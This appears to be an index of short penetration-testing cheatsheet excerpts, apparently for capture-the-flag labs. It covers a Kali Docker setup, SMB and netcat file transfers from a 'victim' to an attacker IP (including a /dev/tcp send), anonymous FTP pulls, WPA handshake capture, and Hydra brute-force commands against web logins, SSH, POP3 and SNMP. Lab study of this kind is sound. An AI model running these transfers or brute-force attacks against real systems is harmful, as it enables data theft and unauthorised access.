Cheatsheets

📂 Files Dockerfile + Distrobox commands (single block) FROM docker.io/kalilinux/kali-rolling ENV DEBIAN_FRONTEND=noninteractive TZ=Etc/UTC # install essentials: zsh sudo tzdata chrony util-linux iproute2 RUN apt update && apt install -y \ zsh sudo tzdata chrony util-linux iproute2 \ && useradd -m -s /usr/bin/zsh kali \ && echo "kali:kali" | chpasswd \ && usermod -aG sudo kali \ && apt clean && rm -rf /var/lib/apt/lists/* USER kali WORKDIR /home/kali ENTRYPOINT ["/usr/bin/zsh","-l"] 🛠️ Build Image Run from the folder with the Dockerfile ...

📂 Files Dockerfile (placed in empty folder) FROM kalilinux/kali-rolling ENV DEBIAN_FRONTEND=noninteractive TZ=Etc/UTC # install essentials: zsh sudo tzdata chrony util-linux iproute2 RUN apt update && apt install -y \ zsh sudo tzdata chrony util-linux iproute2 \ && useradd -m -s /usr/bin/zsh kali \ && echo "kali:kali" | chpasswd \ && usermod -aG sudo kali \ && apt clean && rm -rf /var/lib/apt/lists/* USER kali WORKDIR /home/kali ENTRYPOINT ["/usr/bin/zsh","-l"] 🛠️ Build Image Run from the folder with Dockerfile docker build -t kali-zsh-vm:privileged . 🚀 Create and Run Persistent Privileged Container This creates kali-persistent with host timezone and /tmp/test mounted ...

🖥️ On the Linux Server (Attacker Machine) Start an SMB server using impacket-smbserver: sudo smbserver.py gnu $(pwd) -smb2support gnu: Share name $(pwd): Current working directory to be shared -smb2support: Enables SMB2 support for better compatibility with newer Windows systems 🪟 On the Windows Client (Victim Machine) Access the shared file using UNC path: \\10.10.14.42\gnu\winPEAS.exe 🔸 Replace 10.10.14.42 with the IP of your Linux (attacker) machine 🔸 You can also map this as a network drive or copy files directly using copy or xcopy in CMD or PowerShell ...

🖥️ Step 1: Start Listening on Local Machine (Kali) Run the following command to start listening for incoming files: nc -lp 4444 > filename # waiting for receiving the files 📤 Step 2: Transfer File from Remote Machine (Victim) Run this command on the victim machine to send the file: nc -w 3 10.10.14.19 4444 < filename # it's time to send the file OR, use this alternative method: cat filename > /dev/tcp/10.10.14.19/4444 Note: 10.10.14.19 is the IP address of the local machine (tun0). ...

🧰 Using ftp Command 1. Connect to FTP Server Replace 10.10.10.98 with your target FTP server IP or domain: ftp 10.10.10.98 2. Login as Anonymous Name (10.10.10.98:yourusername): anonymous Password: (press Enter) 3. Set Binary Mode To handle all types of files properly: ftp> binary 4. Disable Prompting (for Multiple Files) ftp> prompt off Interactive mode off. 5. Download Files (Wildcard) ftp> mget * ⚠️ Note: Standard ftp does not support recursive download. For recursive download, use a better client like lftp. ...

🔍 1. Scan Available WiFi Networks 🌐 Scan all nearby WiFi networks sudo airodump-ng mon0 📶 Scan only 2.4 GHz networks (802.11b/g) sudo airodump-ng --band bg mon0 📡 Scan only 5 GHz networks (802.11a) sudo airodump-ng --band a mon0 📋 Band Option Summary --band a → 5 GHz (802.11a) --band b → 2.4 GHz (802.11b) --band g → 2.4 GHz (802.11g) --band bg → All 2.4 GHz (recommended) --band abg → Both 2.4 GHz and 5 GHz 🎯 2. Capture WPA/WPA2 Handshake 🎯 Start listening on target AP # Replace <channel>, <BSSID>, and <output_filename> sudo airodump-ng -c <channel> --bssid <BSSID> -w <output_filename> mon0 Example ...

📤 Uploading/Sending a Directory from Local to SSH Server Use either of the following commands: scp -P 22 -r ./shell/* [email protected]:/home/gnu/shell/ OR scp -r -P 22 ./shell [email protected]:/home/gnu/shell/ 📥 Downloading/Receiving a Directory from SSH Server to Local scp -P 22 -r [email protected]:/home/gnu/* ./gnu/ OR scp -r -P 22 [email protected]:/home/gnu ./gnu/ 📤 Uploading/Sending a File from Local to SSH Server scp -P 22 ./shell.php [email protected]:/home/gnu/shell.php 📥 Downloading/Receiving a File from SSH Server to Local scp -P 22 [email protected]:/home/gnu/flag.txt ./flag.txt 📝 Note: ...

To copy the content from the dev branch to the stable branch in Git, you have a few options depending on your specific needs. Here are some common methods: This will combine the histories of the two branches, creating a merge commit. # Switch to the stable branch git checkout stable # Merge the dev branch into stable git merge dev 2. Rebase stable onto dev This will move the stable branch to the tip of the dev branch, applying the changes from stable on top of dev. This creates a linear history. ...

Hydra is a powerful tool used for performing brute-force attacks on various services. In this tutorial, we’ll explore brute-forcing login pages using different HTTP methods with Hydra. Brute Force Login Page with HTTP GET Method: hydra -C $PAYLOADS/SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt $IP http-get /manager/html -s 8080 hydra -C $PAYLOADS/SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://$IP:8080/manager/html Initiates the Hydra tool and specifies the target URL using the HTTP GET method. Brute Force Login Page with HTTP POST Method: hydra -l darren -P /usr/share/dict/rockyou.txt 10.10.69.229 http-post-form '/:user=^USER^&pass=^PASS^:F=Error: Invalid username or password' -s 8088 hydra -l '' -P 3_digit_pin.txt $IP http-form-post '/login.php:pin=^PASS^:F=Access denied' -s 8000 -v -f Initiates the Hydra tool and specifies the target URL using the HTTP POST method. Brute Force Credentials of POP3 Protocol: hydra -l doak -P /usr/share/dict/fasttrack.txt pop3://$IP -s 55007 Brute Force Credentials of SSH Protocol: hydra -l meliodas -P /usr/share/dict/rockyou.txt ssh://$IP Brute Force Credentials of SNMP Protocol: hydra -P /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt snmp://10.10.152.137 Hydra Options Explained: -C <file>: Specifies the path to the file containing a list of username and password combinations. i.e, admin:admin -L <username file>: Specifies the path to a file containing a list of usernames. -l <username>: Specifies a single username to use for the brute-force attack. -P <password file>: Specifies the path to a file containing a list of passwords. -p <password>: Specifies a single password to use for the brute-force attack. -f / -F : exit when a login/pass pair is found (-M: -f per host, -F global) $IP: Represents the IP address of the target. -s <port>: Specifies the target port. http-get: Initiates a brute-force attack using the HTTP GET method. http-post-form: Initiates a brute-force attack using the HTTP POST method with form parameters. pop3://<IP>: Specifies the POP3 protocol and target IP address. ssh://<IP>: Specifies the SSH protocol and target IP address. snmp://<IP>: Specifies the SNMP protocol and target IP address. Additional flags and options may be included for more detailed configuration and verbose output.

Note: These may behave slightly differently depending on which version of ChatGPT you’re using (free vs Plus, GPT-3.5 vs GPT-4o). Works with GPT-powered tools (like Claude, Perplexity, etc.) too - try it and let me know what works where. Codes (You just type them as a prompt) 1. ELI10: – Explain Like I’m 10 👶 Simplifies complex topics so even a child can understand. 📌 Use for: tech, science, finance, AI, etc. ...